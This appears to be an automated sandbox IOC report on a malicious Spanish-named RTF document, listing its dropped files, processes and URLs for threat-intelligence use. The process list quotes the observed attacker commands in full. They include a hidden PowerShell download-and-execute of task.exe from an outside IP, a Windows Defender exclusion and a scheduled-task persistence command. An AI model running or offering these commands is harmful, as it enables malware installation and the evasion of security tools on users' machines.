IOC Report

loading gif

Files

File Path
Type
Category
Malicious
PAGO DEL SALDO.doc
Rich Text Format data, unknown version
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\task[1].exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
downloaded
malicious
C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT
data
dropped
malicious
C:\Users\user\AppData\Local\Temp\tmpBA6A.tmp
XML 1.0 document, ASCII text
dropped
malicious
C:\Users\user\AppData\Roaming\SzfukVRF.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Roaming\task.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B2CAE3F9.wmf
Targa image data - Map - RLE 1569 x 65536 x 0 +2 "\005"
dropped
clean
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DD7EADD8.png
370 sysV pure executable
dropped
clean
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{359899CB-2F00-4180-B83B-336B1EE05F4F}.tmp
Composite Document File V2 Document, Cannot read section info
dropped
clean
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4D8A2392-564C-4DB2-903D-17A8A736109B}.tmp
data
dropped
clean
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{527B5D4D-3E6F-42BD-8FFA-6C52D5EDBEDF}.tmp
data
dropped
clean
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{88FEB9FD-DBED-46CA-AEE6-1702A6B1006D}.tmp
data
dropped
clean
C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT:Zone.Identifier
ASCII text, with CRLF line terminators
dropped
clean
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\PAGO DEL SALDO.LNK
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 30 20:08:56 2021, mtime=Mon Aug 30 20:08:56 2021, atime=Fri Nov 26 01:21:13 2021, length=393199, window=hide
dropped
clean
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
ASCII text, with CRLF line terminators
dropped
clean
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
data
dropped
clean
C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex
Little-endian UTF-16 Unicode text, with no line terminators
dropped
clean
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0VT7C41M2L4V6JEPSUND.temp
data
dropped
clean
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\35BY7DRSER1V8J9JMCO9.temp
data
dropped
clean
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
data
dropped
clean
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msar (copy)
data
dropped
clean
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CS0OLG9QFDF935YIQMNF.temp
data
dropped
clean
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\X87RSB2KVTP8BHZRK5J6.temp
data
dropped
clean
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms (copy)
data
dropped
clean
C:\Users\user\AppData\Roaming\bf2jvg3x.oex\Chrome\Default\Cookies
SQLite 3.x database, last written using SQLite version 3032001
dropped
clean
C:\Users\user\AppData\Roaming\bf2jvg3x.oex\Firefox\Profiles\7xwghk55.default\cookies.sqlite
SQLite 3.x database, user version 7, last written using SQLite version 3017000
dropped
clean
C:\Users\user\Desktop\~$GO DEL SALDO.doc
data
dropped
clean
There are 17 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe'
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe'
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe'
malicious
C:\Users\user\AppData\Roaming\task.exe
"C:\Users\user\AppData\Roaming\task.exe"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SzfukVRF.exe
malicious
C:\Windows\SysWOW64\schtasks.exe
C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SzfukVRF" /XML "C:\Users\user\AppData\Local\Temp\tmpBA6A.tmp
malicious
C:\Users\user\AppData\Roaming\task.exe
C:\Users\user\AppData\Roaming\task.exe
malicious
C:\Windows\System32\notepad.exe
C:\Windows\system32\NOTEPAD.EXE" "C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT
malicious
C:\Windows\System32\verclsid.exe
"C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5
clean

URLs

Name
IP
Malicious
httP://173.232.2
unknown
malicious
httP://173.232.204.89/t
unknown
malicious